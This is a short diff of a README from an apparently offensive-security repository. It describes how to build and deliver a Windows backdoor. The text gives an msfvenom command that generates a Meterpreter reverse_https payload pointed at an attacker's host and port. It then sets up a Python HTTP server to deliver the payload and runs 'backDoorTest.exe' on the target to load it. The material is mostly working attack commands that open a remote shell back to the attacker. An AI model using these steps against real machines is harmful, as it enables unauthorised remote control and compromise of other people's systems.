Blive77/Cybersecurity/README.md

     msfvenom -p windows/x64/meterpreter/reverse_https lhost=(Host IP) lport=(Host Port) HandlerSSLCert=(Path To cert file) StagerVerifySSLCert=true -f raw > load.bin

-6- Setup the http webserver for Payload download (while in cybersecurity folder)
+6- Setup the http webserver for Payload deliver (important to do this in the same folder the payload was created)

     python -m http.server

 In Windows >

-1- Execute the File created in point (2) backDoorTest.exe
+1- Execute the File created in point (2) "backDoorTest.exe"

     backDoorTest.exe ( can be execute with paramters IP, Port and PayLoad File )